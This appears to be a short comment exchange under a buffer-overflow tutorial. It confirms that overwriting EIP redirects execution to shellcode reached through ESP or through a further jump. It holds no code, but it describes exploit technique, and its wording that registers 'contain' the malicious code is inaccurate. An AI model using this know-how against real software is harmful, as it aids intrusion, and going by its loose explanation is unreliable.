Did I understood it correctly that we are overflowing buffer (to rewrite EIP) but our shellcode is not going into buffer it goes instead into register ESP if there is enough space for it – if not we gorce ESP to jump to another register that can store our shellcode?
That’s exactly right! The only reason we overwrite EIP is to instruct it to redirect execution to another register containing the malicious code. This is normally ESP, but when it doesn’t have enough space we simply use it to perform an additional jump to an appropriate register.